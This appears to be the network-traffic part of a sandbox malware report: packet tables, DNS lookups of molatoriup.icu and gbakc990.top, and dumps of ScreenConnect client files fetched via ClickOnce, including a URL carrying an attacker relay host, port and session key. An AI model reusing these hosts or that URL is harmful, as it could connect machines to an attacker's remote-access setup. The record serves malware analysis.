Oct 5, 2024 01:04:59.698308945 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:04:59.706384897 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:04:59.917289019 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:04:59.963800907 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:05:29.932969093 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:05:29.938051939 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:05:30.148881912 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:05:30.198570013 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:06:00.152040958 CEST	49756	8880	192.168.2.4	31.42.187.210
Oct 5, 2024 01:06:00.157669067 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:06:00.374715090 CEST	8880	49756	31.42.187.210	192.168.2.4
Oct 5, 2024 01:06:00.417619944 CEST	49756	8880	192.168.2.4	31.42.187.210

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2024 01:02:59.094331026 CEST	65401	53	192.168.2.4	1.1.1.1
Oct 5, 2024 01:02:59.113559961 CEST	53	65401	1.1.1.1	192.168.2.4
Oct 5, 2024 01:03:27.585334063 CEST	57534	53	192.168.2.4	1.1.1.1
Oct 5, 2024 01:03:28.141604900 CEST	53	57534	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 5, 2024 01:02:59.094331026 CEST	192.168.2.4	1.1.1.1	0xb630	Standard query (0)	molatoriup.icu	A (IP address)	IN (0x0001)	false
Oct 5, 2024 01:03:27.585334063 CEST	192.168.2.4	1.1.1.1	0x4eb5	Standard query (0)	gbakc990.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 5, 2024 01:02:59.113559961 CEST	1.1.1.1	192.168.2.4	0xb630	No error (0)	molatoriup.icu		31.42.187.211	A (IP address)	IN (0x0001)	false
Oct 5, 2024 01:03:04.194972992 CEST	1.1.1.1	192.168.2.4	0xbbcc	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 5, 2024 01:03:04.194972992 CEST	1.1.1.1	192.168.2.4	0xbbcc	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 5, 2024 01:03:07.653498888 CEST	1.1.1.1	192.168.2.4	0xd68	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 5, 2024 01:03:07.653498888 CEST	1.1.1.1	192.168.2.4	0xd68	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 5, 2024 01:03:07.653538942 CEST	1.1.1.1	192.168.2.4	0xd68	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 5, 2024 01:03:07.653538942 CEST	1.1.1.1	192.168.2.4	0xd68	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 5, 2024 01:03:28.141604900 CEST	1.1.1.1	192.168.2.4	0x4eb5	No error (0)	gbakc990.top		31.42.187.210	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

molatoriup.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:00 UTC	607	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-10-04 23:03:01 UTC	250	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 147976 Content-Type: application/x-ms-application; charset=utf-8 Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:24 GMT Connection: close
2024-10-04 23:03:01 UTC	16134	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 69 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 5a 68 62 48 56 6c 50 6a 42 34 4d 44 41 77 4d 44 41 77 4d 44 45 31 4e 54 41 77 4d 44 41 77 4d 44 77 76 64 6d 46 73 64 57 55 2b 44 51 6f 67 49 43 41 67 50 43 39 7a 5a 58 52 30 61 57 35 6e 50 67 30 4b 49 43 41 67 49 44 78 7a 5a 58 52 30 61 57 35 6e 49 47 35 68 62 57 55 39 49 6b 46 73 62 47 39 33 52 33 56 6c 63 33 52 4a 62 6d 6c 30 61 57 46 30 5a 57 52 47 61 57 78 6c 56 48 4a 68 62 6e 4e 6d 5a 58 49 69 49 48 4e 6c 63 6d 6c 68 62 47 6c 36 5a 55 46 7a 50 53 4a 54 64 48 4a 70 62 6d 63 69 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 5a 68 62 48 56 6c 50 6d 5a 68 62 48 4e 6c 50 43 39 32 59 57 78 31 5a 54 34 4e 43 69 41 67 49 43 41 38 4c 33 4e 6c 64 48 52 70 62 6d 63 2b 44 51 6f 67 49 44 77 76 55 32 4e 79 5a 57 56 75 51 32 Data Ascii: iPg0KICAgICAgPHZhbHVlPjB4MDAwMDAwMDE1NTAwMDAwMDwvdmFsdWU+DQogICAgPC9zZXR0aW5nPg0KICAgIDxzZXR0aW5nIG5hbWU9IkFsbG93R3Vlc3RJbml0aWF0ZWRGaWxlVHJhbnNmZXIiIHNlcmlhbGl6ZUFzPSJTdHJpbmciPg0KICAgICAgPHZhbHVlPmZhbHNlPC92YWx1ZT4NCiAgICA8L3NldHRpbmc+DQogIDwvU2NyZWVuQ2
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 73 41 45 45 41 59 77 42 78 41 48 55 41 61 51 42 79 41 47 55 41 56 77 42 68 41 47 73 41 5a 51 42 4d 41 47 38 41 59 77 42 72 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 44 68 43 67 41 41 4e 6b 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 45 41 62 67 42 75 41 47 38 41 64 41 42 68 41 48 51 41 61 51 42 76 41 47 34 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 50 51 4b 41 41 42 51 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 51 67 42 73 41 47 45 41 62 67 42 72 41 45 63 41 64 51 42 6c 41 48 4d 41 64 41 42 4e 41 47 38 41 62 67 42 70 41 48 51 41 62 77 42 79 41 45 51 41 5a 51 42 7a 41 47 4d 41 63 67 42 70 41 48 41 41 64 41 42 70 41 47 38 41 62 67 41 41 43 77 41 41 52 45 Data Ascii: sAEEAYwBxAHUAaQByAGUAVwBhAGsAZQBMAG8AYwBrAFQAaQB0AGwAZQDhCgAANkMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAEEAbgBuAG8AdABhAHQAaQBvAG4AVABpAHQAbABlAPQKAABQQwBvAG4AdAByAG8AbABQAGEAbgBlAGwAQgBsAGEAbgBrAEcAdQBlAHMAdABNAG8AbgBpAHQAbwByAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAACwAARE
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 6a 41 47 73 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 46 51 41 5a 51 42 34 41 48 51 41 35 53 51 41 41 43 52 48 41 48 55 41 5a 51 42 7a 41 48 51 41 51 51 42 75 41 47 38 41 62 67 42 35 41 47 30 41 62 77 42 31 41 48 4d 41 54 67 42 68 41 47 30 41 5a 51 44 32 4a 41 41 41 50 6b 67 41 61 51 42 6b 41 47 51 41 5a 51 42 75 41 45 45 41 63 41 42 77 41 45 49 41 59 51 42 73 41 47 77 41 62 77 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 2f 53 51 41 41 43 70 49 41 47 6b 41 5a 41 42 6b 41 47 55 41 62 67 42 42 41 48 41 41 63 41 42 43 41 47 45 41 62 41 42 73 41 47 38 41 62 77 42 75 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 41 66 4a 51 41 41 4d 45 6b 41 62 67 42 6d 41 47 38 41 55 41 Data Ascii: jAGsAVABpAHQAbABlAFQAZQB4AHQA5SQAACRHAHUAZQBzAHQAQQBuAG8AbgB5AG0AbwB1AHMATgBhAG0AZQD2JAAAPkgAaQBkAGQAZQBuAEEAcABwAEIAYQBsAGwAbwBvAG4AVABlAHgAdABUAGkAdABsAGUARgBvAHIAbQBhAHQA/SQAACpIAGkAZABkAGUAbgBBAHAAcABCAGEAbABsAG8AbwBuAFQAaQB0AGwAZQAfJQAAMEkAbgBmAG8AUA
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 75 41 52 46 44 62 47 56 68 63 69 42 42 62 6d 35 76 64 47 46 30 61 57 39 75 63 77 46 4b 55 32 56 75 5a 43 42 35 62 33 56 79 49 47 4e 73 61 58 42 69 62 32 46 79 5a 43 42 30 62 79 42 30 61 47 55 67 63 6d 56 74 62 33 52 6c 49 47 31 68 59 32 68 70 62 6d 55 67 59 58 4d 67 61 32 56 35 63 33 52 79 62 32 74 6c 63 79 34 67 56 58 4e 6c 5a 6e 56 73 49 47 5a 76 63 69 42 73 62 32 64 70 62 69 34 42 47 56 4e 6c 62 6d 51 67 51 32 78 70 63 47 4a 76 59 58 4a 6b 49 45 74 6c 65 58 4e 30 63 6d 39 72 5a 58 4d 42 44 30 4e 76 62 6e 52 79 62 32 77 67 55 32 68 68 63 6d 6c 75 5a 77 46 41 52 57 35 68 59 6d 78 6c 49 47 4e 73 61 58 42 69 62 32 46 79 5a 43 42 6f 5a 57 78 77 49 47 5a 76 63 69 42 30 61 47 55 67 53 47 56 73 63 47 56 79 49 48 52 76 49 48 Data Ascii: oZSBzY3JlZW4uARFDbGVhciBBbm5vdGF0aW9ucwFKU2VuZCB5b3VyIGNsaXBib2FyZCB0byB0aGUgcmVtb3RlIG1hY2hpbmUgYXMga2V5c3Ryb2tlcy4gVXNlZnVsIGZvciBsb2dpbi4BGVNlbmQgQ2xpcGJvYXJkIEtleXN0cm9rZXMBD0NvbnRyb2wgU2hhcmluZwFARW5hYmxlIGNsaXBib2FyZCBoZWxwIGZvciB0aGUgSGVscGVyIHRvIH
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 30 61 47 55 67 5a 6d 39 73 5a 47 56 79 49 48 52 76 49 48 4e 6c 62 6d 51 36 41 52 46 37 4d 48 30 67 4c 53 42 54 5a 57 35 6b 49 45 5a 76 62 47 52 6c 63 67 45 43 54 30 73 42 41 41 45 41 41 51 41 42 41 41 45 41 41 51 41 42 41 41 45 41 41 52 5a 37 4d 48 30 67 4c 53 42 46 65 47 6c 30 49 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 41 51 4a 50 53 77 46 72 57 57 39 31 63 69 42 7a 5a 58 4e 7a 61 57 39 75 49 47 46 6a 59 32 56 7a 63 79 42 30 62 32 74 6c 62 69 42 6f 59 58 4d 67 5a 58 68 77 61 58 4a 6c 5a 43 42 76 63 69 42 70 63 79 42 70 62 6e 5a 68 62 47 6c 6b 4c 69 42 51 62 47 56 68 63 32 55 67 63 6d 56 73 59 58 56 75 59 32 67 67 64 47 68 70 63 79 42 68 63 48 42 73 61 57 4e 68 64 47 6c 76 62 69 42 30 62 79 42 79 5a 57 5a 79 5a 58 4e 6f 49 48 52 6f 5a 53 42 30 62 32 Data Ascii: 0aGUgZm9sZGVyIHRvIHNlbmQ6ARF7MH0gLSBTZW5kIEZvbGRlcgECT0sBAAEAAQABAAEAAQABAAEAARZ7MH0gLSBFeGl0IEFwcGxpY2F0aW9uAQJPSwFrWW91ciBzZXNzaW9uIGFjY2VzcyB0b2tlbiBoYXMgZXhwaXJlZCBvciBpcyBpbnZhbGlkLiBQbGVhc2UgcmVsYXVuY2ggdGhpcyBhcHBsaWNhdGlvbiB0byByZWZyZXNoIHRoZSB0b2
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 79 33 62 46 63 74 4e 75 68 4a 53 6d 4a 56 72 75 6e 78 7a 65 56 2f 56 31 52 56 4f 31 34 4f 50 50 6f 74 65 2f 46 72 7a 76 51 4f 6e 6a 79 63 4d 46 32 71 72 6a 52 6d 37 48 77 35 66 53 31 46 33 78 7a 61 6e 37 31 57 4f 54 66 67 73 4d 74 39 61 6b 37 44 4a 4e 48 79 74 2b 49 42 66 37 39 4c 33 36 62 6b 6d 52 6e 69 6a 76 55 6e 75 34 6e 41 6f 70 37 6c 50 69 7a 31 37 32 5a 2b 64 7a 42 35 6d 70 75 50 54 78 35 75 49 6a 74 64 43 4a 39 6a 49 70 74 33 70 43 2b 64 6b 78 54 63 31 76 63 58 47 78 4a 45 2f 43 48 4c 6f 54 62 65 6e 39 66 68 4e 30 6f 78 36 6b 38 4e 45 79 6d 6e 41 32 6e 6e 79 68 49 37 56 39 39 62 41 2f 59 56 53 71 47 49 33 5a 45 78 63 33 36 57 34 2f 66 66 58 35 2b 2f 62 6a 44 6b 34 65 70 73 45 73 6a 57 46 54 63 5a 73 48 51 32 71 50 70 37 50 4c 52 4b 4e 76 72 30 63 Data Ascii: y3bFctNuhJSmJVrunxzeV/V1RVO14OPPote/FrzvQOnjycMF2qrjRm7Hw5fS1F3xzan71WOTfgsMt9ak7DJNHyt+IBf79L36bkmRnijvUnu4nAop7lPiz172Z+dzB5mpuPTx5uIjtdCJ9jIpt3pC+dkxTc1vcXGxJE/CHLoTben9fhN0ox6k8NEymnA2nnyhI7V99bA/YVSqGI3ZExc36W4/ffX5+/bjDk4epsEsjWFTcZsHQ2qPp7PLRKNvr0c
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 41 45 41 41 41 41 42 41 41 45 44 41 41 41 41 5a 72 77 36 4a 51 41 41 41 41 5a 51 54 46 52 46 41 41 41 41 7a 44 49 79 47 48 58 54 47 67 41 41 41 41 46 30 55 6b 35 54 41 45 44 6d 32 47 59 41 41 41 42 53 53 55 52 42 56 48 6a 61 37 64 61 78 44 59 41 77 46 45 50 42 55 44 45 47 6f 37 44 2f 46 6f 78 42 46 36 6f 55 45 58 2b 42 4f 50 66 71 61 79 32 35 4e 55 6e 61 6f 36 73 58 41 51 41 51 41 48 37 64 51 43 41 34 65 74 6b 44 41 45 41 43 65 4f 66 68 6e 77 41 41 41 41 41 41 4c 41 68 47 51 42 6f 6f 76 78 77 41 41 49 73 44 53 55 72 75 41 34 37 7a 55 66 35 46 39 30 43 76 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 49 49 41 41 41 41 43 4a 55 45 35 48 44 51 6f 61 43 67 41 41 41 41 31 4a 53 45 52 53 41 41 41 41 49 41 41 41 41 43 41 42 41 77 41 41 41 45 6d 30 36 4c 63 41 Data Ascii: AEAAAABAAEDAAAAZrw6JQAAAAZQTFRFAAAAzDIyGHXTGgAAAAF0Uk5TAEDm2GYAAABSSURBVHja7daxDYAwFEPBUDEGo7D/FoxBF6oUEX+BOPfqay25NUnao6sXAQAQAH7dQCA4etkDAEACeOfhnwAAAAAALAhGQBoovxwAAIsDSUruA47zUf5F90CvAAAAAElFTkSuQmCCIIAAAACJUE5HDQoaCgAAAA1JSERSAAAAIAAAACABAwAAAEm06LcA
2024-10-04 23:03:01 UTC	16384	IN	Data Raw: 42 64 70 49 52 59 37 4f 41 42 55 4b 69 75 46 7a 64 2b 6d 32 42 6e 46 71 4e 4f 37 48 67 55 57 44 32 43 37 49 58 77 6e 54 68 47 61 43 7a 43 41 41 6a 2b 55 4d 4b 32 61 44 75 42 4a 7a 36 50 41 55 51 4c 34 74 42 78 39 75 47 56 33 46 6b 6d 75 43 4d 30 46 47 4d 43 78 67 6a 36 55 73 4a 62 49 48 56 47 4d 41 48 59 39 43 68 77 74 67 4d 39 6d 6c 43 77 6c 38 4e 63 78 46 6d 49 64 38 4c 30 44 6f 46 4c 59 55 65 41 56 77 53 4e 71 78 2f 67 44 67 7a 59 73 41 76 68 53 4e 64 72 51 52 66 68 6e 2b 59 56 59 37 4f 41 41 63 47 71 4a 43 65 42 72 74 47 4c 38 68 66 4f 4f 52 34 46 6a 42 2f 44 4a 52 64 6a 4b 4c 38 4c 6e 5a 70 46 6b 46 6d 49 78 67 67 51 67 58 6f 47 31 55 50 6b 62 4a 34 43 44 4a 7a 4c 73 45 38 42 58 2f 43 4a 73 6f 68 67 39 4a 62 30 51 69 77 73 77 67 44 4d 46 48 41 56 75 Data Ascii: BdpIRY7OABUKiuFzd+m2BnFqNO7HgUWD2C7IXwnThGaCzCAAj+UMK2aDuBJz6PAUQL4tBx9uGV3FkmuCM0FGMCxgj6UsJbIHVGMAHY9ChwtgM9mlCwl8NcxFmId8L0DoFLYUeAVwSNqx/gDgzYsAvhSNdrQRfhn+YVY7OAAcGqJCeBrtGL8hfOOR4FjB/DJRdjKL8LnZpFkFmIxggQgXoG1UPkbJ4CDJzLsE8BX/CJsohg9Jb0QiwswgDMFHAVu
2024-10-04 23:03:01 UTC	770	IN	Data Raw: 48 6f 4a 44 41 6a 67 6e 41 55 61 77 2f 47 76 6a 2b 46 6e 76 6e 57 44 32 33 6a 6f 41 51 45 63 72 56 42 6a 4f 4a 69 43 2f 63 43 41 41 49 35 57 75 44 45 63 53 47 42 41 41 50 4e 52 51 63 64 77 49 49 45 42 41 63 7a 48 42 42 37 44 77 65 67 61 44 7a 34 67 67 4f 4d 75 41 61 39 63 6a 44 69 31 6e 6e 78 41 41 45 64 64 41 6c 36 37 47 48 47 36 33 6e 6e 30 41 51 45 63 63 77 6c 34 37 32 70 45 61 6a 62 33 37 41 4d 43 4f 44 61 48 34 63 5a 77 49 49 45 42 41 63 78 37 68 68 2f 44 77 51 69 32 68 61 63 66 45 4d 42 78 4f 5a 33 45 63 48 41 78 49 6d 59 6f 4a 53 43 41 34 37 49 33 68 69 4d 52 74 67 4d 44 41 6a 67 71 61 32 4d 34 55 6c 46 37 2f 67 45 42 48 47 55 4a 32 42 69 4f 79 4e 6d 4d 42 41 6a 67 4f 45 76 41 54 6d 4b 49 6e 56 5a 6f 51 41 42 48 52 41 6b 34 49 51 74 76 41 45 41 41 Data Ascii: HoJDAjgnAUaw/Gvj+FnvnWD23joAQEcrVBjOJiC/cCAAI5WuDEcSGBAAPNRQcdwIIEBAczHBB7DwegaDz4ggOMuAa9cjDi1nnxAAEddAl67GHG63nn0AQEccwl472pEajb37AMCODaH4cZwIIEBAcx7hh/DwQi2hacfEMBxOZ3EcHAxImYoJSCA47I3hiMRtgMDAjgqa2M4UlF7/gEBHGUJ2BiOyNmMBAjgOEvATmKInVZoQABHRAk4IQtvAEAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:02 UTC	96	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:02 UTC	215	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17866 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:26 GMT Connection: close
2024-10-04 23:03:02 UTC	16169	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-10-04 23:03:03 UTC	1697	IN	Data Raw: 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30 Data Ascii: q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	31.42.187.211	443	7120	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 23:03:09 UTC	98	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: molatoriup.icu Accept-Encoding: gzip
2024-10-04 23:03:09 UTC	215	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95520 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-437666475 Microsoft-HTTPAPI/2.0 Date: Fri, 04 Oct 2024 23:02:33 GMT Connection: close
2024-10-04 23:03:09 UTC	16169	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-10-04 23:03:10 UTC	16384	IN	Data Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
